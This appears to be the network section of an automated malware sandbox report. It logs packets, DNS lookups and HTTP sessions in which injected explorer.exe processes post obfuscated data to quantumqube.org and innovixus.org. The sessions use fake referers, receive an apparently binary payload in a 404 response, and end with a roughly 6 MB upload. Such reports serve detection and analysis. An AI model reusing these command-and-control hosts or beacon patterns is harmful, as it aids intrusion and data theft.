                                                                                                                                    Oct 6, 2024 21:28:55.189950943 CEST8049749194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:55.994390011 CEST8049749194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:56.074081898 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.853692055 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.854495049 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.858875036 CEST8049749194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:10.858959913 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.859280109 CEST8049750194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:10.859335899 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.859481096 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.859503031 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:10.864252090 CEST8049750194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:10.864389896 CEST8049750194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:11.760560036 CEST8049750194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:11.964747906 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.307445049 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.308979988 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.312711000 CEST8049750194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:29.313548088 CEST4975080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.313783884 CEST8049751194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:29.314513922 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.314513922 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.314553022 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:29.319328070 CEST8049751194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:29.319451094 CEST8049751194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:30.176273108 CEST8049751194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:30.230372906 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.241683006 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.242316008 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.247679949 CEST8049751194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:48.247850895 CEST4975180192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.247925043 CEST8049752194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:48.248064041 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.248104095 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.248116970 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:29:48.253021955 CEST8049752194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:48.253160954 CEST8049752194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:48.979929924 CEST8049752194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:29:49.168030977 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.049767971 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.050472021 CEST4975380192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.054928064 CEST8049752194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:05.054982901 CEST4975280192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.055252075 CEST8049753194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:05.055315971 CEST4975380192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.055474997 CEST4975380192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.055516005 CEST4975380192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:05.060189009 CEST8049753194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:05.060364008 CEST8049753194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:05.827975988 CEST8049753194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:06.043035984 CEST4975380192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:30:06.047552109 CEST8049753194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:30:06.047616005 CEST4975380192.168.2.8194.87.189.87

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 6, 2024 21:26:30.189364910 CEST5620653192.168.2.81.1.1.1
                                                                                                                                    Oct 6, 2024 21:26:30.205813885 CEST53562061.1.1.1192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.272406101 CEST5511653192.168.2.81.1.1.1
                                                                                                                                    Oct 6, 2024 21:26:30.536979914 CEST53551161.1.1.1192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.834398985 CEST5240553192.168.2.81.1.1.1
                                                                                                                                    Oct 6, 2024 21:27:36.068567991 CEST53524051.1.1.1192.168.2.8

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Oct 6, 2024 21:26:30.189364910 CEST192.168.2.81.1.1.10x6dcbStandard query (0)quantumqube.orgA (IP address)IN (0x0001)false
                                                                                                                                    Oct 6, 2024 21:26:30.272406101 CEST192.168.2.81.1.1.10xa26fStandard query (0)innovixus.orgA (IP address)IN (0x0001)false
                                                                                                                                    Oct 6, 2024 21:27:35.834398985 CEST192.168.2.81.1.1.10x89b9Standard query (0)innovixus.orgA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Oct 6, 2024 21:26:30.205813885 CEST1.1.1.1192.168.2.80x6dcbNo error (0)quantumqube.org194.87.189.87A (IP address)IN (0x0001)false
                                                                                                                                    Oct 6, 2024 21:26:30.536979914 CEST1.1.1.1192.168.2.80xa26fNo error (0)innovixus.org198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                    Oct 6, 2024 21:27:36.068567991 CEST1.1.1.1192.168.2.80x89b9No error (0)innovixus.org198.54.117.242A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • upgyyhdoyghspm.org
                                                                                                                                      • quantumqube.org
                                                                                                                                    • smuegklsriebfq.com
                                                                                                                                      • innovixus.org
                                                                                                                                    • drfkgcucoqvlrnnc.net
                                                                                                                                    • thbqljycmivxnpmr.net
                                                                                                                                    • rdycpqjqlugnms.org
                                                                                                                                    • crwqlqtuysbj.com
                                                                                                                                    • qlijxlatgdyt.com
                                                                                                                                    • wqvfywivxptqmt.org
                                                                                                                                    • raievqxnfbig.com
                                                                                                                                    • vvywjtocjkatexf.net
                                                                                                                                    • mxfkxoyxtgh.com
                                                                                                                                    • qxdsgfawkutaw.com

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.849714194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:26:30.211853981 CEST283OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://upgyyhdoyghspm.org/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 111
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:26:30.211853981 CEST111OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 37 90 e9 35
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{75B}w{`r`[O:=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.849718198.54.117.242804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST281OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://smuegklsriebfq.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 233
                                                                                                                                    Host: innovixus.org
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST233OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 08 94 e9 16
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{\zbLkn82/aV6)Ea6g[93X'$yS`w!ytRO*,"<`%K0KP{Qn0`-'


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.849730194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:35.783380985 CEST285OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://drfkgcucoqvlrnnc.net/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 257
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:27:35.783402920 CEST257OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 54 b9 e7 37
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{T7}|-6EG=E3LPHqiJIq'3&d-C*uTUUas|FR"OR#"]!Y~2ot;wE%B%*rr


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.849734198.54.117.242804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:36.074981928 CEST283OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://thbqljycmivxnpmr.net/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 148
                                                                                                                                    Host: innovixus.org
                                                                                                                                    Oct 6, 2024 21:27:36.075068951 CEST148OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 27 87 90 71
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{'q9a$_}q&U1sYw+31hH}6M^
                                                                                                                                    Oct 6, 2024 21:27:36.642191887 CEST345INHTTP/1.1 403 Forbidden
                                                                                                                                    Date: Sun, 06 Oct 2024 19:27:36 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Server: namecheap-nginx
                                                                                                                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.849738194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:36.712831020 CEST283OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://rdycpqjqlugnms.org/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 114
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:27:36.712853909 CEST114OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 27 c2 80 01
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{'.$GC8PJeZDy


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.849742198.54.117.242804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:36.783082962 CEST279OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://crwqlqtuysbj.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 172
                                                                                                                                    Host: innovixus.org
                                                                                                                                    Oct 6, 2024 21:27:36.783169031 CEST172OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 1a dd f6 74
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{t9<&tM-c'"i'p)z9T#q(L`<@M\3uk3


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.849746194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:36.999839067 CEST281OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://qlijxlatgdyt.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 168
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:27:36.999982119 CEST168OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 07 89 9c 2c
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{,_+BM|_\()+!~>`b:VpXrfTJpbdX=rT!
                                                                                                                                    Oct 6, 2024 21:27:37.689305067 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:27:37 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 66 37 30 0d 0a 40 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 27 d2 6c ac 11 c6 52 d1 3b 37 d7 a5 36 82 b4 8a ab 80 da 1b be 00 a0 92 05 00 03 0c a7 32 01 0b 00 00 07 00 9e 03 00 00 62 02 28 96 e9 7a 2a f4 cb 78 52 7f 40 00 50 00 77 c0 64 47 47 36 9c 8d 96 4a ed d1 9e d6 80 c4 6c 33 99 24 a7 b4 b4 35 c3 e1 cb 26 ef 22 79 42 75 08 78 08 f7 1d 9b dc 6b cb 0a ea f2 8b 19 bf 99 78 b9 82 ba ce 22 33 4f 4a a8 df 50 78 ae 76 77 2e c7 9b 5e 2d 28 67 32 da c8 c9 75 cd d4 a5 2b c1 10 eb 1d a0 33 0d 98 9e 44 f7 6b a9 c6 24 31 3d 1d f1 ea e8 ae 1d d5 84 1f af 15 26 fb 4f bb 25 b9 52 6e f5 a0 8a 0a 49 0e 48 3c 5c 38 d3 13 33 ca aa 9b 5c 35 3f 78 1b f1 19 e1 c2 70 4c e8 73 36 6b 7d d5 d3 6e a4 5e 14 85 a9 0e a1 79 e7 e2 8f d9 fc 87 1e 17 08 2a d3 a7 57 64 02 f2 1f 97 3a 75 05 d6 39 26 05 29 1b 93 de cb 73 67 b8 04 d4 23 37 bf be 0b 34 b2 74 c4 1a 80 c5 9c f5 2b 45 c2 a1 ce 66 f8 cd ce 41 e1 68 9b cb 45 74 60 87 17 b6 fb [TRUNCATED]
                                                                                                                                    Data Ascii: f70@g@GHSN'E|6V#^.v'lR;762b(z*xR@PwdGG6Jl3$5&"yBuxkx"3OJPxvw.^-(g2u+3Dk$1=&O%RnIH<\83\5?xpLs6k}n^y*Wd:u9&)sg#74t+EfAhEt`iVzu5(b>wl?rmbJ9TJxeByyOvF"04HRH=%|\6|gg;D`}k'z7)a< `t,a+~NE:91 [t*}"?<Vs[-9\*j?l^\Gesqq=,E5T%9bH<_zjpeH`!}-uIW}Yb*Dr`-+i9z&mc7L)<zA2w@z]S~<N&]rIFvRn!zrY4OLwkk}#tYhBkqKe)!0PXA2u)}%BobsA^B5PVEyS+dLJvjlMy%[e$$$NR"b73+{l_!],NM2`~ Cri,ojn0cJAa]< Z+DEqvZ@#j [TRUNCATED]
                                                                                                                                    Oct 6, 2024 21:27:37.689363956 CEST1236INData Raw: 1f 68 7b ff 8c 53 3e 87 69 23 3e 4a 98 d5 35 9e 75 b0 87 46 f6 35 e4 d3 d8 5b 75 70 28 b6 cc a5 52 27 8d 2b e4 2d 87 d5 32 91 53 97 5e 47 b3 b8 82 d4 05 09 44 fc 97 d8 59 cd 1e 8e 57 92 9e 4b 41 31 11 b7 05 a1 e0 a2 79 f8 13 17 16 6f 6b 73 b7 fa
                                                                                                                                    Data Ascii: h{S>i#>J5uF5[up(R'+-2S^GDYWKA1yoksLcWg!#VX\p^@IIpy5D:ND87z+'G~;}&v!eo|c.@+XX8ro^u?_jb_/x.Nyg$f
                                                                                                                                    Oct 6, 2024 21:27:37.689408064 CEST128INData Raw: 38 cb f3 57 00 cf df 83 0b da 27 0f 47 34 fa 7f 3a ae e7 b1 a9 fc 32 71 75 fe 46 99 e9 84 85 6f 70 a5 82 79 d3 43 e3 30 75 82 36 2b 55 bc b6 35 b6 42 ab 20 b3 5c 20 d4 79 8e 73 b3 c4 07 df 40 47 cf d1 68 df c2 d7 b7 a1 2e 23 5b 76 43 a5 cf 34 ab
                                                                                                                                    Data Ascii: 8W'G4:2quFopyC0u6+U5B \ ys@Gh.#[vC4>uZE%U5%Yg7)>LA1bv#i
                                                                                                                                    Oct 6, 2024 21:27:37.689439058 CEST1236INData Raw: c6 24 91 86 41 51 c1 ee 45 ce 3d 7e 58 c5 f4 ca 75 92 ea f7 e4 ea 4e 32 3e 51 91 08 23 92 6b 3b ed e7 11 72 8b c2 18 27 97 78 17 a7 2c 63 c8 db 30 e9 6d fe e2 ab aa 3b d7 4d 51 55 a7 43 4c 39 e2 87 ec 10 7b 15 fe 2f 84 64 8d d6 75 83 ef 0d 7e f7
                                                                                                                                    Data Ascii: $AQE=~XuN2>Q#k;r'x,c0m;MQUCL9{/du~|#.xJ%77"26q7<EY}]uf:T9Z%>`q*Xq&fFt_~CMh2vNsae"*x.V!#0
                                                                                                                                    Oct 6, 2024 21:27:37.689492941 CEST1236INData Raw: a7 5f 3f f1 26 c3 f6 56 5c d2 4b ad 66 60 f3 ee 30 8b 57 95 08 b6 ae c1 3b c6 86 9b c6 d3 6f 06 41 17 cf 74 a5 b9 27 9a a4 28 82 25 6e b7 da 12 47 cc 9d 8c 78 c4 2e 3f 98 79 b9 c0 e4 ec ee ea 32 f5 ca 4f 9b a6 61 c6 47 ea 37 7d da 47 b4 a4 7b 9d
                                                                                                                                    Data Ascii: _?&V\Kf`0W;oAt'(%nGx.?y2OaG7}G{-Ws|P}vuoiu{|0G.U'/;;c8Fbs>t*7)Bo!"y0F.l35&lkQ*}$kX-ja,y8~#0H6?Unj'_v}&
                                                                                                                                    Oct 6, 2024 21:27:37.689529896 CEST1236INData Raw: 93 8e 10 13 c6 15 a4 4e 79 6f 43 cb 98 0e df 93 b7 96 5c e2 c3 35 5a 51 9b f3 7e 7f d1 b8 69 e4 53 33 61 d6 32 17 7c 1d e5 8c 61 9d 58 80 22 65 86 e1 5d f0 8c 92 24 ba b7 5c 21 d9 61 b2 00 5c 0e 41 cf e4 02 05 36 f9 93 e6 27 46 2f 44 c1 a9 09 a9
                                                                                                                                    Data Ascii: NyoC\5ZQ~iS3a2|aX"e]$\!a\A6'F/Du0VlVE-}-@/5P^W"QL><#XkVc&j?8n,R}aXxTspBPoNPG^y@}f41ADPVu>9S:W
                                                                                                                                    Oct 6, 2024 21:27:37.689564943 CEST1236INData Raw: ba 0d 16 8f c7 77 ef a6 40 20 48 90 6b ef 0e 82 c9 3f f6 d4 cc 12 8c 61 a2 0d f8 fd 50 e7 e0 96 35 25 91 5b 8c 07 d0 b5 e9 f1 be 1e e8 95 53 cf 6c f1 78 bc 12 4a 70 2e 46 70 66 9d e1 93 60 22 7a 1e 19 4b 64 25 66 c0 d5 15 af 9b bd e1 78 07 fb 63
                                                                                                                                    Data Ascii: w@ Hk?aP5%[SlxJp.Fpf`"zKd%fxcWa:(s'S.@{dqjRjM@q6$^]$;&o:{<44ob+C_4#H[qN#"kxOP^dttLje[Q%n)@7Ai
                                                                                                                                    Oct 6, 2024 21:27:37.689599991 CEST1236INData Raw: 4b a6 ee 6a ac cf ed ce fd 9b 55 b5 a6 5e 29 4c 6e 31 ff 3e 38 ad d4 9d 48 81 2f 43 18 f6 ff 9b 49 29 36 0b c3 87 76 82 16 71 9c dc de 23 eb ae 51 f3 43 02 5a 1a 9e 44 07 6f 78 c9 1b 9f 8b c0 6f 2a 7b 75 af fe 4f 7e 72 5e 46 da de a1 33 b6 16 f6
                                                                                                                                    Data Ascii: KjU^)Ln1>8H/CI)6vq#QCZDoxo*{uO~r^F3GpO)In7mN*UNp}N]$r$Egp)#EwpI#r?tu-^4TwQ!d{9<_{N0@Q&_b_VB
                                                                                                                                    Oct 6, 2024 21:27:37.689634085 CEST760INData Raw: 40 a2 85 4c e5 4f 40 89 35 09 93 6e 0c 58 dc 02 ef 4f 2a dc fe 3f f9 b5 db c0 ac f5 c7 45 23 2b ac 1d b3 5a ac 5e 98 6d dc 1c 5a 46 03 8a 9c 0b d5 3c f5 7e 58 fd 55 bb 58 79 13 6e 8d 20 2a ac eb e2 57 2d fb ca e7 3f d7 d2 f7 75 90 ff 44 51 1c 49
                                                                                                                                    Data Ascii: @LO@5nXO*?E#+Z^mZF<~XUXyn *W-?uDQI(U1ur 94;d=T&Aa)Rf?QmEx%'zvY_mwtct5myXrkg2Fp{:K&]*3h4N;^i@q1h$2epNnA
                                                                                                                                    Oct 6, 2024 21:27:37.775978088 CEST1236INData Raw: b5 49 3f 8f f5 0e 18 09 7e 39 74 66 d5 51 90 84 98 1e ee 7e e7 16 c6 83 f5 0f d8 55 1f c2 66 4b 60 f8 ef 09 6b ca af cf f9 a2 5f 27 01 b4 10 2f d9 87 dd 88 47 77 e3 3e 50 7f 6a a0 bd fe 49 9b 5e 5d 82 05 ed da 16 75 2f e2 42 ac ee ed 76 9c 16 0b
                                                                                                                                    Data Ascii: I?~9tfQ~UfK`k_'/Gw>PjI^]u/BvvwHdlNGG3D!5<!-jf4?RAuD\LS*4qNwe'hN%am-?U}<^eV)LO-AM4&+E,N`uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.849747194.87.189.87801868C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:27:42.369002104 CEST280OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://quantumqube.org/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 501
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:27:42.369024992 CEST501OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 6c 6e 68 7b 05 d5 0c 11 fc 0e 26 b0 fb 0e
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X83Xc2]Aalnh{&V4jp%n cE5LgO%>e?q )V(dy0GQ4E65?nEz$Sw/"@"4xWOQC9i


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.849748194.87.189.87805440C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:28:16.087595940 CEST284OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://quantumqube.org/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 6348785
                                                                                                                                    Host: quantumqube.org
